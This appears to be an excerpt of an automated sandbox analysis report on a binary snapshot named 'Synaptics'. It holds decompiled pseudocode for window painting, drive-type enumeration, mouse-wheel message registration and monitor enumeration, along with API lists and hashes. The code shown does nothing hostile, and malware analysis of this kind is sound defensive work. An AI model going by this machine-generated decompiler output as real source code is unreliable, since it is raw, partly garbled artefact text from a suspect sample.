                                                                                                                                                                                          0x00442685
                                                                                                                                                                                          0x00442685
                                                                                                                                                                                          0x004426e5
                                                                                                                                                                                          0x004426e5
                                                                                                                                                                                          0x004426fe
                                                                                                                                                                                          0x00442709
                                                                                                                                                                                          0x0044270a
                                                                                                                                                                                          0x0044270b
                                                                                                                                                                                          0x0044270c
                                                                                                                                                                                          0x0044271d
                                                                                                                                                                                          0x00442739
                                                                                                                                                                                          0x00442740
                                                                                                                                                                                          0x00442743
                                                                                                                                                                                          0x00442746
                                                                                                                                                                                          0x0044274e
                                                                                                                                                                                          0x00442752
                                                                                                                                                                                          0x00442757
                                                                                                                                                                                          0x00442758
                                                                                                                                                                                          0x0044275d
                                                                                                                                                                                          0x00442765
                                                                                                                                                                                          0x0044276d
                                                                                                                                                                                          0x00442775
                                                                                                                                                                                          0x0044277c
                                                                                                                                                                                          0x0044277e
                                                                                                                                                                                          0x00442785
                                                                                                                                                                                          0x00442791
                                                                                                                                                                                          0x00442791
                                                                                                                                                                                          0x00442785
                                                                                                                                                                                          0x0044279c
                                                                                                                                                                                          0x0044279c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73CCB080.USER32(00000000), ref: 0044252C
                                                                                                                                                                                          • GetClientRect.USER32 ref: 0044254F
                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00442561
                                                                                                                                                                                          • MapWindowPoints.USER32 ref: 00442577
                                                                                                                                                                                          • OffsetRect.USER32(?,?,?), ref: 0044258C
                                                                                                                                                                                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 004425A5
                                                                                                                                                                                          • InflateRect.USER32(?,00000000,00000000), ref: 004425C3
                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 00442619
                                                                                                                                                                                          • DrawEdge.USER32(?,?,00000000,00000008), ref: 004426E5
                                                                                                                                                                                          • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004426FE
                                                                                                                                                                                          • OffsetRect.USER32(?,?,?), ref: 0044271D
                                                                                                                                                                                          • FillRect.USER32 ref: 00442739
                                                                                                                                                                                          • 73CCB380.USER32(00000000,?,00442765,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00442758
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 156109915-0
                                                                                                                                                                                          • Opcode ID: a110ff9a93dfc761bce5d57d5e916418852a8b18f182c9e32c65a8a75eeea78d
                                                                                                                                                                                          • Instruction ID: af5f50b217af5c554848a1b825971ec4031c124bbe34cabe8649f27ab7cee0d4
                                                                                                                                                                                          • Opcode Fuzzy Hash: a110ff9a93dfc761bce5d57d5e916418852a8b18f182c9e32c65a8a75eeea78d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 48911771E04208AFDB01DBA9C985EEEB7F9AF09314F5440A6F504F7252C779AE40DB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00473F50 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 160COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E00473F50(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v56;
				int _t58;
				void* _t59;
				signed int _t67;
				signed int _t80;
				void* _t90;
				intOrPtr _t107;
				void* _t121;
				signed int _t123;
				intOrPtr* _t126;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t121 = __edx;
				_v8 = __eax;
				_push(_t126);
				_push(0x47418f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t126;
				_t123 = GetLogicalDrives();
				_t90 = 0x41;
				do {
					if((0x00000001 << 0xffffffffffffffbf & _t123) != 0) {
						if(_t121 != 0xffffffff) {
							E00404BA8();
							E00404C88( &_v24, 0x4741a8);
							_t58 = GetDriveTypeA(E00404E80(_v24));
							_push(0);
							_push(_t58);
							_t59 = _t121;
							asm("cdq");
							__eflags = 0 - _v56;
							if(__eflags == 0) {
								__eflags = _t59 -  *_t126;
							}
							if(__eflags == 0) {
								E00404BA8();
								E00404CCC( &_v12, 0x4741a8, _v28);
								_t67 = GetDriveTypeA(E00404E80(_v12));
								__eflags = _t67 - 6;
								if(_t67 > 6) {
									L24:
									E00404A58( &_v16, "Unknown");
								} else {
									switch( *((intOrPtr*)(_t67 * 4 +  &M004740DC))) {
										case 0:
											goto L24;
										case 1:
											E00404A58( &_v16, "Invalid root path");
											goto L25;
										case 2:
											__eax =  &_v16;
											__edx = "Removable";
											__eax = E00404A58( &_v16, __edx);
											goto L25;
										case 3:
											__eax =  &_v16;
											__edx = 0x4741e4;
											__eax = E00404A58( &_v16, 0x4741e4);
											goto L25;
										case 4:
											__eax =  &_v16;
											__edx = "Remote (network)";
											__eax = E00404A58( &_v16, __edx);
											goto L25;
										case 5:
											__eax =  &_v16;
											__edx = "CD-ROM";
											__eax = E00404A58( &_v16, __edx);
											goto L25;
										case 6:
											__eax =  &_v16;
											__edx = "RAM disk";
											__eax = E00404A58( &_v16, __edx);
											goto L25;
									}
								}
								L25:
								 *((intOrPtr*)( *_v8 + 0x38))();
							}
						} else {
							E00404BA8();
							E00404CCC( &_v12, 0x4741a8, _v20);
							_t80 = GetDriveTypeA(E00404E80(_v12));
							if(_t80 > 6) {
								L11:
								E00404A58( &_v16, "Unknown");
							} else {
								switch( *((intOrPtr*)(_t80 * 4 +  &M00473FCD))) {
									case 0:
										goto L11;
									case 1:
										E00404A58( &_v16, "Invalid root path");
										goto L12;
									case 2:
										__eax =  &_v16;
										__edx = "Removable";
										__eax = E00404A58( &_v16, __edx);
										goto L12;
									case 3:
										__eax =  &_v16;
										__edx = 0x4741e4;
										__eax = E00404A58( &_v16, 0x4741e4);
										goto L12;
									case 4:
										__eax =  &_v16;
										__edx = "Remote (network)";
										__eax = E00404A58( &_v16, __edx);
										goto L12;
									case 5:
										__eax =  &_v16;
										__edx = "CD-ROM";
										__eax = E00404A58( &_v16, __edx);
										goto L12;
									case 6:
										__eax =  &_v16;
										__edx = "RAM disk";
										__eax = E00404A58( &_v16, __edx);
										goto L12;
								}
							}
							L12:
							 *((intOrPtr*)( *_v8 + 0x38))();
							 *((intOrPtr*)( *_v8 + 0x38))();
						}
					}
					_t90 = _t90 + 1;
				} while (_t90 != 0x5b);
				_pop(_t107);
				 *[fs:eax] = _t107;
				_push(E00474196);
				return E004049E4( &_v28, 5);
			}



















                                                                                                                                                                                          0x00473f55
                                                                                                                                                                                          0x00473f56
                                                                                                                                                                                          0x00473f57
                                                                                                                                                                                          0x00473f58
                                                                                                                                                                                          0x00473f59
                                                                                                                                                                                          0x00473f5a
                                                                                                                                                                                          0x00473f5e
                                                                                                                                                                                          0x00473f60
                                                                                                                                                                                          0x00473f65
                                                                                                                                                                                          0x00473f66
                                                                                                                                                                                          0x00473f6b
                                                                                                                                                                                          0x00473f6e
                                                                                                                                                                                          0x00473f76
                                                                                                                                                                                          0x00473f78
                                                                                                                                                                                          0x00473f7a
                                                                                                                                                                                          0x00473f8a
                                                                                                                                                                                          0x00473f93
                                                                                                                                                                                          0x00474070
                                                                                                                                                                                          0x0047407d
                                                                                                                                                                                          0x0047408b
                                                                                                                                                                                          0x00474092
                                                                                                                                                                                          0x00474093
                                                                                                                                                                                          0x00474094
                                                                                                                                                                                          0x00474096
                                                                                                                                                                                          0x00474097
                                                                                                                                                                                          0x0047409b
                                                                                                                                                                                          0x0047409d
                                                                                                                                                                                          0x0047409d
                                                                                                                                                                                          0x004740a2
                                                                                                                                                                                          0x004740ad
                                                                                                                                                                                          0x004740bd
                                                                                                                                                                                          0x004740cb
                                                                                                                                                                                          0x004740d0
                                                                                                                                                                                          0x004740d3
                                                                                                                                                                                          0x00474152
                                                                                                                                                                                          0x0047415a
                                                                                                                                                                                          0x004740d5
                                                                                                                                                                                          0x004740d5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00474100
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00474107
                                                                                                                                                                                          0x0047410a
                                                                                                                                                                                          0x0047410f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00474116
                                                                                                                                                                                          0x00474119
                                                                                                                                                                                          0x0047411e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00474125
                                                                                                                                                                                          0x00474128
                                                                                                                                                                                          0x0047412d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00474134
                                                                                                                                                                                          0x00474137
                                                                                                                                                                                          0x0047413c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00474143
                                                                                                                                                                                          0x00474146
                                                                                                                                                                                          0x0047414b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004740d5
                                                                                                                                                                                          0x0047415f
                                                                                                                                                                                          0x00474167
                                                                                                                                                                                          0x00474167
                                                                                                                                                                                          0x00473f99
                                                                                                                                                                                          0x00473f9e
                                                                                                                                                                                          0x00473fae
                                                                                                                                                                                          0x00473fbc
                                                                                                                                                                                          0x00473fc4
                                                                                                                                                                                          0x00474043
                                                                                                                                                                                          0x0047404b
                                                                                                                                                                                          0x00473fc6
                                                                                                                                                                                          0x00473fc6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00473ff1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00473ff8
                                                                                                                                                                                          0x00473ffb
                                                                                                                                                                                          0x00474000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00474007
                                                                                                                                                                                          0x0047400a
                                                                                                                                                                                          0x0047400f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00474016
                                                                                                                                                                                          0x00474019
                                                                                                                                                                                          0x0047401e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00474025
                                                                                                                                                                                          0x00474028
                                                                                                                                                                                          0x0047402d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00474034
                                                                                                                                                                                          0x00474037
                                                                                                                                                                                          0x0047403c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00473fc6
                                                                                                                                                                                          0x00474050
                                                                                                                                                                                          0x00474058
                                                                                                                                                                                          0x00474063
                                                                                                                                                                                          0x00474063
                                                                                                                                                                                          0x00473f93
                                                                                                                                                                                          0x0047416a
                                                                                                                                                                                          0x0047416b
                                                                                                                                                                                          0x00474176
                                                                                                                                                                                          0x00474179
                                                                                                                                                                                          0x0047417c
                                                                                                                                                                                          0x0047418e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLogicalDrives.KERNEL32 ref: 00473F71
                                                                                                                                                                                          • GetDriveTypeA.KERNEL32(00000000,00000000,0047418F,?,?,00000000,022B2A8C,00000000,00000000,00000000,00000000,00000000,00000000,?,0049600F,00000000), ref: 00473FBC
                                                                                                                                                                                          • GetDriveTypeA.KERNEL32(00000000,00000000,0047418F,?,?,00000000,022B2A8C,00000000,00000000,00000000,00000000,00000000,00000000,?,0049600F,00000000), ref: 0047408B
                                                                                                                                                                                          • GetDriveTypeA.KERNEL32(00000000,00000000,00000000,0047418F,?,?,00000000,022B2A8C,00000000,00000000,00000000,00000000,00000000,00000000,?,0049600F), ref: 004740CB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DriveType$DrivesLogical
                                                                                                                                                                                          • String ID: CD-ROM$Fixed$Invalid root path$RAM disk$Remote (network)$Removable$Unknown
                                                                                                                                                                                          • API String ID: 2715012092-3183225172
                                                                                                                                                                                          • Opcode ID: bb2f0219e60e50d5b06ad4ca2b6f8fd805d8d9a8d87ffdc8b567d72c3f56ee17
                                                                                                                                                                                          • Instruction ID: 8332d3c0b4ea855eee04026cb9a70cd7c2c9abd5e967455e7ab158e986997913
                                                                                                                                                                                          • Opcode Fuzzy Hash: bb2f0219e60e50d5b06ad4ca2b6f8fd805d8d9a8d87ffdc8b567d72c3f56ee17
                                                                                                                                                                                          • Instruction Fuzzy Hash: A2516574A041099BC700FBA1C4459FEB379EBD5314BA1C1BBE929B3741D73C9E868A1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407B3C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00407B3C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}








                                                                                                                                                                                          0x00407b43
                                                                                                                                                                                          0x00407b45
                                                                                                                                                                                          0x00407b47
                                                                                                                                                                                          0x00407b59
                                                                                                                                                                                          0x00407b68
                                                                                                                                                                                          0x00407b74
                                                                                                                                                                                          0x00407b80
                                                                                                                                                                                          0x00407b85
                                                                                                                                                                                          0x00407ba4
                                                                                                                                                                                          0x00407b8b
                                                                                                                                                                                          0x00407b9b
                                                                                                                                                                                          0x00407b9b
                                                                                                                                                                                          0x00407ba9
                                                                                                                                                                                          0x00407bc6
                                                                                                                                                                                          0x00407baf
                                                                                                                                                                                          0x00407bbf
                                                                                                                                                                                          0x00407bbf
                                                                                                                                                                                          0x00407bd3

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindWindowA.USER32 ref: 00407B54
                                                                                                                                                                                          • RegisterClipboardFormatA.USER32 ref: 00407B60
                                                                                                                                                                                          • RegisterClipboardFormatA.USER32 ref: 00407B6F
                                                                                                                                                                                          • RegisterClipboardFormatA.USER32 ref: 00407B7B
                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00407B93
                                                                                                                                                                                          • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00407BB7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                                                                                                                                          • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                                                                                                          • API String ID: 1416857345-3736581797
                                                                                                                                                                                          • Opcode ID: 0179412f67920de798f9c13ffa58e1f48972bddb8ada30114eac596137a089b6
                                                                                                                                                                                          • Instruction ID: 32a8b66fc92957f21ca9bbef851e7a8d2f13c74dcc19ac79790c4ff9c798c5cc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0179412f67920de798f9c13ffa58e1f48972bddb8ada30114eac596137a089b6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 49112471A48301AFE310AF55CC45F66B7E8EF45754F208436B944AB3C1D6B8BD40C7AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00432F08 Relevance: 18.1, APIs: 12, Instructions: 142COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 57%
                                                                                                                                                                                          			E00432F08(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				struct HDC__* _t55;
				void* _t74;
				signed int _t77;
				int _t78;
				int _t79;
				void* _t92;
				intOrPtr _t105;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t122;
				intOrPtr _t123;

				_t120 = _t122;
				_t123 = _t122 + 0xffffffbc;
				_t92 = __ecx;
				_v8 = __edx;
				_t114 = __eax;
				_t43 = GetWindowLongA(E00441704(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E00441704(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_t55 = E00441704(_v8);
					_push(_t55);
					L00407730();
					_v12 = _t55;
					_push(_t120);
					_push(0x433063);
					_push( *[fs:edx]);
					 *[fs:edx] = _t123;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t117 = _t114;
					if(_t92 != 0) {
						_t77 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
							_t78 = GetSystemMetrics(2);
							_t79 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							E00419804(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t117 = _t117;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E00432B40( &_v56, 2);
					E00432A94(_t117,  &_v56, _v12, 0,  &_v44);
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x43306a);
					_push(_v12);
					_t74 = E00441704(_v8);
					_push(_t74);
					L00407888();
					return _t74;
				}
			}






















                                                                                                                                                                                          0x00432f09
                                                                                                                                                                                          0x00432f0b
                                                                                                                                                                                          0x00432f11
                                                                                                                                                                                          0x00432f13
                                                                                                                                                                                          0x00432f16
                                                                                                                                                                                          0x00432f23
                                                                                                                                                                                          0x00432f2b
                                                                                                                                                                                          0x00433070
                                                                                                                                                                                          0x00432f31
                                                                                                                                                                                          0x00432f3e
                                                                                                                                                                                          0x00432f53
                                                                                                                                                                                          0x00432f5b
                                                                                                                                                                                          0x00432f60
                                                                                                                                                                                          0x00432f61
                                                                                                                                                                                          0x00432f66
                                                                                                                                                                                          0x00432f6b
                                                                                                                                                                                          0x00432f6c
                                                                                                                                                                                          0x00432f71
                                                                                                                                                                                          0x00432f74
                                                                                                                                                                                          0x00432f7e
                                                                                                                                                                                          0x00432f7f
                                                                                                                                                                                          0x00432f80
                                                                                                                                                                                          0x00432f81
                                                                                                                                                                                          0x00432f82
                                                                                                                                                                                          0x00432f85
                                                                                                                                                                                          0x00432f92
                                                                                                                                                                                          0x00432f9c
                                                                                                                                                                                          0x00432fa7
                                                                                                                                                                                          0x00432fb0
                                                                                                                                                                                          0x00432fbf
                                                                                                                                                                                          0x00432fd9
                                                                                                                                                                                          0x00432fe5
                                                                                                                                                                                          0x00432fe6
                                                                                                                                                                                          0x00432fe7
                                                                                                                                                                                          0x00432fe8
                                                                                                                                                                                          0x00432fe9
                                                                                                                                                                                          0x00432ffa
                                                                                                                                                                                          0x00432ffa
                                                                                                                                                                                          0x00432f9c
                                                                                                                                                                                          0x0043301f
                                                                                                                                                                                          0x0043302b
                                                                                                                                                                                          0x0043303e
                                                                                                                                                                                          0x00433045
                                                                                                                                                                                          0x00433048
                                                                                                                                                                                          0x0043304b
                                                                                                                                                                                          0x00433053
                                                                                                                                                                                          0x00433057
                                                                                                                                                                                          0x0043305c
                                                                                                                                                                                          0x0043305d
                                                                                                                                                                                          0x00433062
                                                                                                                                                                                          0x00433062

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 00432F23
                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00432F3E
                                                                                                                                                                                          • OffsetRect.USER32(?,?,?), ref: 00432F53
                                                                                                                                                                                          • 73CCB080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00432F61
                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 00432F92
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00432FA7
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00432FB0
                                                                                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00432FBF
                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00432FEC
                                                                                                                                                                                          • FillRect.USER32 ref: 00432FFA
                                                                                                                                                                                          • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043301F
                                                                                                                                                                                          • 73CCB380.USER32(00000000,?,0043306A,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043305D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3936689491-0
                                                                                                                                                                                          • Opcode ID: 6e3feaa59ff7954d7f1e1212010fcca33713d4ca3cef126796b1d2c495fcecae
                                                                                                                                                                                          • Instruction ID: 04c1fd49532e7d442bf35e743343acee4fdea8649fd85b2f3a22c1a56fe95c6f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e3feaa59ff7954d7f1e1212010fcca33713d4ca3cef126796b1d2c495fcecae
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9415E71E04108ABDB01EAE9CD82EDFB7BDEF49364F100126F904F7291CA78AE418765
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042CAA8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                          			E0042CAA8(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x49e92f != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x49e91c = E0042C4FC(7, _t60,  *0x49e91c, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                                                                                                                                                                                          0x0042cab1
                                                                                                                                                                                          0x0042cab4
                                                                                                                                                                                          0x0042cabe
                                                                                                                                                                                          0x0042caee
                                                                                                                                                                                          0x0042caf4
                                                                                                                                                                                          0x0042cbb0
                                                                                                                                                                                          0x0042cbb8
                                                                                                                                                                                          0x0042cbb8
                                                                                                                                                                                          0x0042cafc
                                                                                                                                                                                          0x0042cb01
                                                                                                                                                                                          0x0042cb0c
                                                                                                                                                                                          0x0042cb17
                                                                                                                                                                                          0x0042cb1c
                                                                                                                                                                                          0x0042cb85
                                                                                                                                                                                          0x0042cb9d
                                                                                                                                                                                          0x0042cbae
                                                                                                                                                                                          0x0042cb99
                                                                                                                                                                                          0x0042cb99
                                                                                                                                                                                          0x0042cb99
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042cb85
                                                                                                                                                                                          0x0042cb28
                                                                                                                                                                                          0x0042cb37
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042cb49
                                                                                                                                                                                          0x0042cb61
                                                                                                                                                                                          0x0042cb77
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042cb7d
                                                                                                                                                                                          0x0042cb7f
                                                                                                                                                                                          0x0042cb7f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042cb61
                                                                                                                                                                                          0x0042cad2
                                                                                                                                                                                          0x0042cae7
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042CAE1
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0042CB06
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0042CB11
                                                                                                                                                                                          • GetClipBox.GDI32(?,?), ref: 0042CB23
                                                                                                                                                                                          • GetDCOrgEx.GDI32(?,?), ref: 0042CB30
                                                                                                                                                                                          • OffsetRect.USER32(?,?,?), ref: 0042CB49
                                                                                                                                                                                          • IntersectRect.USER32 ref: 0042CB5A
                                                                                                                                                                                          • IntersectRect.USER32 ref: 0042CB70
                                                                                                                                                                                            • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                          Strings
